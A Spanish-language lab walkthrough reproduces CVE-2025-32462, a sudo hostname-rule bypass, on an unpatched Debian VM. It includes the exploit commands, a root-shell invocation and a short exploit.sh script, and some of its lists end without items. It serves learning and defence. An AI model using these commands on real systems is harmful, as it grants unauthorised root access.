
CVE-2025-32462 es una vulnerabilidad de escalada de privilegios local en sudo
CVE-2025-32462 es una vulnerabilidad de escalada local de privilegios en sudo que permite a un usuario con pocos privilegios ejecutar comandos como root abusando de las reglas de sudo restringidas por hostname. El problema reside en cómo sudo manejaba históricamente la opción -h (host) durante las comprobaciones de autorización.
Cuando una regla de sudoers está restringida a un hostname específico, sudo solo debería permitir la ejecución cuando el hostname del sistema coincide con la regla. Debido a una lógica defectuosa, las versiones afectadas confiaban en un hostname proporcionado por el usuario mediante sudo -h, lo que permitía a los atacantes omitir la restricción por completo.
sudo permitía que el argumento -h <hostname> influyera en las decisiones de autorización. En las versiones vulnerables, el hostname proporcionado se consideraba de confianza durante la evaluación de las reglas de sudoers, en lugar de validarse estrictamente contra el hostname real del sistema.
Como resultado, las restricciones de sudo basadas en host podían omitirse.
Si se explota con éxito, un atacante local puede:
En entornos del mundo real, esta vulnerabilidad es especialmente peligrosa en:
| Componente | Detalles |
|---|---|
| SO | Debian 11 (Bullseye – sin parchear) |
| Versión de sudo | ≤ 1.9.13 |
| Nivel de acceso | Usuario local |
| Virtualización | VirtualBox |
⚠️ Nota: Las versiones modernas de Ubuntu y Debian han incorporado parches retroaplicados (backports) manteniendo cadenas de versión similares. Esta vulnerabilidad no puede reproducirse en sistemas parcheados.
sudo --version
Resultado esperado (vulnerable):
Sudo version 1.9.5p2
sudo useradd -m attacker
sudo passwd attacker
groups attacker
Resultado esperado:
attacker : attacker
El usuario no debe pertenecer al grupo sudo.
Edita sudoers de forma segura:
sudo visudo
Añade la siguiente línea:
attacker prod-server = (root) ALL
prod-server es un hostname falsoVerifica:
sudo -l -U attacker
Resultado esperado:
User attacker may run the following commands on prod-server:
(root) ALL
Cambia de usuario:
su - attacker
Intenta ejecutar sudo de forma normal:
sudo id
Resultado esperado:
attacker is not allowed to run sudo on <hostname>
Activa la vulnerabilidad:
sudo -h prod-server id
Salida de una explotación exitosa:
uid=0(root) gid=0(root) groups=0(root)
Abre una shell de root:
sudo -h prod-server /bin/bash
Verifica:
id
#!/bin/bash
echo "[*] Attempting CVE-2025-32462 exploitation"
sudo -h prod-server id
Guárdalo como exploit.sh, hazlo ejecutable y ejecútalo como el usuario attacker:
chmod +x exploit.sh
./exploit.sh
| Acción | Resultado |
|---|---|
| sudo normal | ❌ Denegado |
sudo -h prod-server id | ✅ Root |
Esto confirma una escalada de privilegios exitosa.
Las versiones modernas de Ubuntu parecen incluir versiones de sudo que se encuentran dentro del rango afectado. Sin embargo, Ubuntu ha retroaplicado el parche de seguridad para CVE‑2025‑32462 sin cambiar la cadena de versión original.
Como resultado:
sudo -h ya no influye en las comprobaciones de autorizaciónEsto resalta la importancia de validar el estado de la vulnerabilidad mediante pruebas de comportamiento, y no solo mediante las cadenas de versión.
sudo a una versión parcheadaEste recorrido tiene fines exclusivamente educativos y de investigación defensiva en seguridad. No pruebes esta vulnerabilidad en sistemas que no sean de tu propiedad o para los que no tengas permiso explícito de evaluación.